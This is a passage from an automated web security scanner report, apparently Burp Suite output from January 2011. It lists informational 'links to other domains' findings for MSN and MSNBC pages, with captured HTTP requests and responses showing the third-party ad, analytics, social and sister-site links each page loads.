http://www.redacted/scp/AuthServiceFacebookLogOff.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following links to other domains:

http://col.stc.s-redacted/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png
http://col.stc.s-redacted/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico

Request

GET /scp/AuthServiceFacebookLogOff.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: facebook_userid=; expires=Fri, 28-Jan-2011 23:53:36 GMT; path=/; HttpOnly
Set-Cookie: facebook_session_key=; domain=www.redacted; expires=Fri, 28-Jan-2011 23:53:36 GMT; HttpOnly
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 1234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
</title>
<link rel="SHORTCUT ICON" href="http://col.stc.s-redacted/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico" type="image/x-icon" />
</head>
...[SNIP]...
<h1><img src="http://col.stc.s-redacted/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png" alt="MSN" /></h1>
...[SNIP]...

22.436. http://www.redacted/scp/AuthServiceTwitter.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/scp/AuthServiceTwitter.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following link to another domain:

https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en

Request

Response

22.437. http://www.redacted/scp/AuthServiceTwitter.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/scp/AuthServiceTwitter.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following link to another domain:

https://twitter.com/oauth/authorize?oauth_token=GyGZcgtBmTImMxbbFIU7wxGUd01aaZThGreMIOYHjRQ&lang=en

Request

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 17:10:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://twitter.com/oauth/authorize?oauth_token=GyGZcgtBmTImMxbbFIU7wxGUd01aaZThGreMIOYHjRQ&lang=en
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 220

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=GyGZcgtBmTImMxbbFIU7wxGUd01aaZThGreMIOYHjRQ&lang=en">here</a>.</h
...[SNIP]...

22.438. http://www.msnbc.redacted/id/21134540/vp/41314849 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/21134540/vp/41314849

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/21134540/vp/41314849?from=en-us_msnhp&GT1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp/41314849?from=en-us_msnhp&GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.439. http://www.msnbc.redacted/id/21134540/vp/41317511 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/21134540/vp/41317511

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/21134540/vp/41317511?from=en-us_msnhp&gt1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp/41317511?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.440. http://www.msnbc.redacted/id/21134540/vp/41326711 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/21134540/vp/41326711

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/21134540/vp/41326711?from=en-us_msnhp&gt1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp/41326711?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.441. http://www.msnbc.redacted/id/21134540/vp=41325705& previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/21134540/vp=41325705&

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/21134540/vp=41325705&?from=en-us_msnhp&gt1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp=41325705&?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.442. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41253088/ns/technology_and_science-science

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://edition.cnn.com/2011/OPINION/01/15/christakis.dolphin.mom/index.html?hpt=C2
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41253088/ns/technology_and_science-science?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.443. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41311073/ns/business-consumer_news/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/?gt1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://lifeinc.todayshow.com/_news/2011/01/21/5894196-survey-most-people-go-to-work-when-sick
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41311073/ns/business-consumer_news/?gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.444. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets?gt1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://feeds.livescience.com/~r/Livesciencecom/~3/VjLFlF9ZwpM/pot-soda-vs-four-loko-which-is-more-dangerous-012811.html
http://feeds.livescience.com/~r/Livesciencecom/~3/bOWHIxnGgs4/coping-with-seasonal-affective-disorder-110125.html
http://feeds.livescience.com/~r/Livesciencecom/~3/bOkkdE2_G1Q/great-pyramid-of-giza-houses-secret-rooms-110128.html
http://feeds.livescience.com/~r/Livesciencecom/~3/r_9t7f7UkmQ/orangutan-conservation-bts-110128.html
http://feeds.livescience.com/~r/Livesciencecom/~3/zWECusFor0E/bartenders-help-veterans-mental-health-services-110128.html
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.lifeslittlemysteries.com/
http://www.lifeslittlemysteries.com/how-does-a-virus-infect-your-computer-0826/'
http://www.lifeslittlemysteries.com/protect-internet-passwords-cyber-security-hackers-1049/
http://www.lifeslittlemysteries.com/what-is-net-neutrality-and-why-should-you-care-1146/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41320309/ns/technology_and_science-tech_and_gadgets?gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 75327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110128/nn_05bwi_tweets_110128.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">

<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets/"></a>
...[SNIP]...
<li><a href="http://www.lifeslittlemysteries.com/how-does-a-virus-infect-your-computer-0826/'">How Does a Virus Infect Your Computer? </a>
...[SNIP]...
<li><a href="http://www.lifeslittlemysteries.com/protect-internet-passwords-cyber-security-hackers-1049/">How to Writer Strong Computer Passwords </a>
...[SNIP]...
<li><a href="http://www.lifeslittlemysteries.com/what-is-net-neutrality-and-why-should-you-care-1146/">What's Net Neutrality, and Why Should You Care? </a>
...[SNIP]...
<em>Natalie Wolchover is a staff writer for <a href="http://www.lifeslittlemysteries.com/">Life's Little Mysteries</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i1 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/zWECusFor0E/bartenders-help-veterans-mental-health-services-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/zWECusFor0E/bartenders-help-veterans-mental-health-services-110128.html">

<span property="dc:title">
...[SNIP]...
<li class="i2 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/bOWHIxnGgs4/coping-with-seasonal-affective-disorder-110125.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/bOWHIxnGgs4/coping-with-seasonal-affective-disorder-110125.html">

<span property="dc:title">
...[SNIP]...
<li class="i3 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/VjLFlF9ZwpM/pot-soda-vs-four-loko-which-is-more-dangerous-012811.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/VjLFlF9ZwpM/pot-soda-vs-four-loko-which-is-more-dangerous-012811.html">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/r_9t7f7UkmQ/orangutan-conservation-bts-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/r_9t7f7UkmQ/orangutan-conservation-bts-110128.html">

<span property="dc:title">
...[SNIP]...
<li class="i5 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/bOkkdE2_G1Q/great-pyramid-of-giza-houses-secret-rooms-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/bOkkdE2_G1Q/great-pyramid-of-giza-houses-secret-rooms-110128.html">

<span property="dc:title">
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

22.445. http://www.msnbc.redacted/id/41327694/ns/us_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327694/ns/us_news/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/41327694/ns/us_news/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41327694/ns/us_news/?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.446. http://www.msnbc.redacted/id/8004316/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbcom.112.2o7.net/b/ss/msnbcom/1/H.15.1--NS/0
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nbcsports.msnbc.com/id/3032113/ns/sports
http://nbcsports.msnbc.com/id/3032113/ns/sports/
http://nightly.msnbc.com/
http://privacy.microsoft.com/en-us/default.mspx
http://rachel.msnbc.com/
http://today.msnbc.com/
http://tv.msnbc.com/
http://www.alerts.msnbc.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.breakingnews.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/msnbc/
http://www.hotmail.com/
http://www.newsletters.msnbc.com/
http://www.newsvine.com/
http://www.newsweek.com/
http://www.omniture.com/
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 01:57:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 165444

<html><head>
<script language='javascript' type='text/javascript'>
<!--
req_108_1296352676=new Image();
req_108_1296352676.src='/__ssobj/ard.png?5567792347586920986_1_0-108-'+(26891*48207+
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://msnbcom.112.2O7.net/b/ss/msnbcom/1/H.15.1--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="">
</noscript>
...[SNIP]...
<li class="i1 hotmail">
<a href="http://www.hotmail.com/">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com/">More</a>
...[SNIP]...
<li class="i7">
<a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9">
<a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14">
<a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18">
<a target="_blank" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li class="i19">
<a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20">
<a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="i3 bing" id="bing">
<a href="http://www.bing.com/"><span>
...[SNIP]...
<li class="i2 show-today">
<a href="http://today.msnbc.com/">TODAY</a>
...[SNIP]...
<li class="i3 show-nightly">
<a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp">
<a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline">
<a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow">
<a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball">
<a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc">
<a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine">
<a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock">
<a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li grid="38129929" class="i6">
<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<h2><a href="http://today.msnbc.com/">TODAY</a>
...[SNIP]...
<h2><a href="http://nbcsports.msnbc.com/id/3032113/ns/sports/">NBC Sports</a>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.newsweek.com">Newsweek</a></li>
<li><a href="http://www.newsvine.com">Newsvine</a></li>
<li><a href="http://www.everyblock.com">EveryBlock</a>
...[SNIP]...
<li><a href="http://www.breakingnews.com">Breaking News</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/id/3032113/ns/sports">Sports</a>
...[SNIP]...
<div class="button btn-7"><a href="http://www.alerts.msnbc.com/"> </a></div>
<div class="link"><a href="http://www.newsletters.msnbc.com/">Sign up for newsletters & alerts</a>
...[SNIP]...
<div class="button btn-3"><a href="http://www.facebook.com/msnbc/"> </a></div>
